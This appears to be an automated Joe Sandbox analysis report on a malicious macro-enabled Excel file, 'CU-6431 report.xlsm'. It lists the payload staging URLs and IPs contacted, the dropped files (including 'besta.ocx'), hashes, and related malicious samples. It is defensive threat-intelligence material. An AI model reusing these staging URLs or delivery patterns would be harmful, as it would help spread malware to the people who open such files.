                                                                                                          https://login.windows.net/common/oauth2/authorize1EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorize2EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);srcbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://login.windows.net/common/oauth2/authorize3EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://devnull.onenote.com72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                  		high
                                                                                                                  https://login.windows.net/common/oauth2/authorize6EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://login.windows.net/common/oauth2/authorize-EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorize.EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingEXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                          		high
                                                                                                                          https://skyapi.live.net/Activity/EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech/FEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.pngBX1IWYL9.htm.1.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://api.cortana.ai72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown

                                                                                                                            Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            162.240.9.126
                                                                                                                            		standoutglobal.comUnited States
                                                                                                                            		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                            107.180.46.229
                                                                                                                            		vendes.marketingUnited States
                                                                                                                            		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                                                                                                                            General Information

                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                            Analysis ID:532531
                                                                                                                            Start date:02.12.2021
                                                                                                                            Start time:11:34:25
                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                            Overall analysis duration:0h 6m 10s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Sample file name:CU-6431 report.xlsm
                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                            Number of analysed new started processes analysed:26
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • HDC enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal68.expl.winXLSM@4/7@2/2
                                                                                                                            EGA Information:Failed
                                                                                                                            HDC Information:Failed
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 0
                                                                                                                            • Number of non-executed functions: 1
                                                                                                                            Cookbook Comments:
                                                                                                                            • Adjust boot time
                                                                                                                            • Enable AMSI
                                                                                                                            • Found application associated with file extension: .xlsm
                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                            • Attach to Office via COM
                                                                                                                            • Scroll down
                                                                                                                            • Close Viewer
                                                                                                                            Warnings:
                                                                                                                            Show All
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.12.233, 52.109.12.22, 52.109.8.25
                                                                                                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, us.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                            • Execution Graph export aborted for target EXCEL.EXE, PID 7136 because there are no executed function
                                                                                                                            • Not all processes where analyzed, report is missing behavior information

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            No simulations

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            162.240.9.126CU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                            • standoutglobal.com/2/MWpqeVgZ/
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • standoutglobal.com/2/MWpqeVgZ/
                                                                                                                            107.180.46.229CU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                            • vendes.marketing/transmigrant/Wplzr/
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • vendes.marketing/transmigrant/Wplzr/
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • vendes.marketing/transmigrant/Wplzr/
                                                                                                                            Purchase Inquiry&Product Specification.exeGet hashmaliciousBrowse
                                                                                                                            • www.nihongo.school/cu6s/?u6utf=W50CE7q4q9oP7gRqIAd9YQ9RaMYKauZAxq11Ezs86ZRrs4WUxbwZ3395pe/S2qg7huHC&9rN46F=xVMHGdB8

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            vendes.marketingCU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            standoutglobal.comSCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 162.240.9.126
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 162.240.9.126

                                                                                                                            ASN

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            UNIFIEDLAYER-AS-1USCU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                            • 162.240.9.126
                                                                                                                            DkX9HVJTmi.exeGet hashmaliciousBrowse
                                                                                                                            • 108.167.135.122
                                                                                                                            Shipping report -17420.xlsxGet hashmaliciousBrowse
                                                                                                                            • 162.241.169.32
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 162.240.9.126
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 162.240.9.126
                                                                                                                            INVOICE.exeGet hashmaliciousBrowse
                                                                                                                            • 162.214.80.6
                                                                                                                            img20048901738_Pago.pdf.exeGet hashmaliciousBrowse
                                                                                                                            • 192.185.115.3
                                                                                                                            PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                            • 162.241.126.156
                                                                                                                            PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                            • 162.241.126.156
                                                                                                                            New order documents. pdf..............exeGet hashmaliciousBrowse
                                                                                                                            • 108.179.232.76
                                                                                                                            part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                            • 162.241.62.201
                                                                                                                            img20048901740_Pago.pdf.exeGet hashmaliciousBrowse
                                                                                                                            • 192.185.115.3
                                                                                                                            part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                            • 162.241.62.201
                                                                                                                            shedy.exeGet hashmaliciousBrowse
                                                                                                                            • 162.241.218.172
                                                                                                                            product list.xlsxGet hashmaliciousBrowse
                                                                                                                            • 162.241.218.178
                                                                                                                            accounts...exeGet hashmaliciousBrowse
                                                                                                                            • 192.185.164.148
                                                                                                                            New product of Aluminium Profile.exeGet hashmaliciousBrowse
                                                                                                                            • 192.185.84.191
                                                                                                                            BL. AWSMUNDAR3606-21.exeGet hashmaliciousBrowse
                                                                                                                            • 162.241.148.56
                                                                                                                            draft_inv dec21.exeGet hashmaliciousBrowse
                                                                                                                            • 162.241.120.147
                                                                                                                            bank details.exeGet hashmaliciousBrowse
                                                                                                                            • 192.185.134.38
                                                                                                                            AS-26496-GO-DADDY-COM-LLCUSCU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            DHL2480021250.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.44.132
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            PAYMENT PROOF.exeGet hashmaliciousBrowse
                                                                                                                            • 160.153.63.160
                                                                                                                            TT swift copy.exeGet hashmaliciousBrowse
                                                                                                                            • 148.66.138.249
                                                                                                                            DHL DOCUMENT FOR #504.exeGet hashmaliciousBrowse
                                                                                                                            • 72.167.241.180
                                                                                                                            Purchase order.exeGet hashmaliciousBrowse
                                                                                                                            • 148.66.138.249
                                                                                                                            swift copy.exeGet hashmaliciousBrowse
                                                                                                                            • 160.153.63.160
                                                                                                                            print_01.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.56.180
                                                                                                                            New order.exeGet hashmaliciousBrowse
                                                                                                                            • 148.66.138.249
                                                                                                                            PO_30-11-2021.xlsxGet hashmaliciousBrowse
                                                                                                                            • 166.62.110.60
                                                                                                                            New order.exeGet hashmaliciousBrowse
                                                                                                                            • 148.66.138.249
                                                                                                                            ORDEN DE COMPRA (2).exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.88.78
                                                                                                                            remitted payment.exeGet hashmaliciousBrowse
                                                                                                                            • 160.153.63.160
                                                                                                                            ORDEN DE COMPRA (2).exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.88.78
                                                                                                                            ABONOF2201_exe.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.56.180
                                                                                                                            request quotation.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.38.104
                                                                                                                            Linux_amd64Get hashmaliciousBrowse
                                                                                                                            • 160.153.92.132
                                                                                                                            cT69PbT3G6.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.51.79

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            37f463bf4616ecd445d4a1937da06e19Rifc8lYWh7.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            umA9dNEzIh.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            Rifc8lYWh7.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            umA9dNEzIh.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            rU6eiJaifC.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            Kqn63gUZFq.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            837375615376.dllGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            837375615376.dllGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            lzJWJgZhPc.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            #U0420R#U04223445FM.htmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            SMK_EFT_BILLPAY.htmlGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            GlobalfoundriesINV33-45776648.htmGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            koCttsCjGY.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            Chrome.Update.23af76.jsGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            DHL Express shipment notification.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            Chrome.Update.23af76.jsGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126
                                                                                                                            Transferencia_29_11_2021 17.03.39.exeGet hashmaliciousBrowse
                                                                                                                            • 107.180.46.229
                                                                                                                            • 162.240.9.126

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\72CBFE55-51D8-483F-AB8D-10F17659EA7C
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):140352
                                                                                                                            Entropy (8bit):5.35745935500725
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:zcQIfgxrBdA3gBwtnQ9DQW+zUb4Ff7nXmvid1XiE6LWmE9:puQ9DQW+zfXfH
                                                                                                                            MD5:289D3310A81DF95B3FB249A22A5979E8
                                                                                                                            SHA1:524AD470682AB5844A76FA682787A3CE4E687C04
                                                                                                                            SHA-256:9860E12150278A279979678927363EAACD890100CE69CFE6FD6C9D9076FE1102
                                                                                                                            SHA-512:C20D225DEFDF6A377621432CF316E7F458CEC88668ED31BD045FFA05092BFE19781CAA3B1F1ADD26F959EC073FF0607BD3C414E50B18BACB61195DE91AE5AA09
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T10:35:17">.. Build: 16.0.14729.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EA155E99.tmp
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1536
                                                                                                                            Entropy (8bit):1.1464700112623651
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                            MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                            SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                            SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                            SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FF60AF8.png
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):14200
                                                                                                                            Entropy (8bit):7.855440184003825
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                                                                                                                            MD5:4FE798EE522800691796BC9446918C90
                                                                                                                            SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                                                                                                                            SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                                                                                                                            SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BX1IWYL9.htm
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):174739
                                                                                                                            Entropy (8bit):5.2177771329382745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                                                                                                                            MD5:8390656A9CE7D214386AE81EA0B89D32
                                                                                                                            SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                                                                                                                            SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                                                                                                                            SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor
                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF6A7C4B1E6825A89E.TMP
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):512
                                                                                                                            Entropy (8bit):0.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3::
                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            C:\Users\user\Desktop\~$CU-6431 report.xlsm
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                            MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                            SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                            SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                            SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                            Malicious:true
                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                            C:\Users\user\besta.ocx
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):174739
                                                                                                                            Entropy (8bit):5.2177771329382745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                                                                                                                            MD5:8390656A9CE7D214386AE81EA0B89D32
                                                                                                                            SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                                                                                                                            SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                                                                                                                            SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                                                                                                                            Malicious:false
                                                                                                                            Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:Microsoft Excel 2007+
                                                                                                                            Entropy (8bit):7.624498524713085
                                                                                                                            TrID:
                                                                                                                            • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                            • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                            • ZIP compressed archive (8000/1) 8.08%
                                                                                                                            File name:CU-6431 report.xlsm
                                                                                                                            File size:38040
                                                                                                                            MD5:0630d6c04e8365531eff7998a7fc40c6
                                                                                                                            SHA1:e4c59420e2024e4f5f5a14e0cd366023d9d0e636
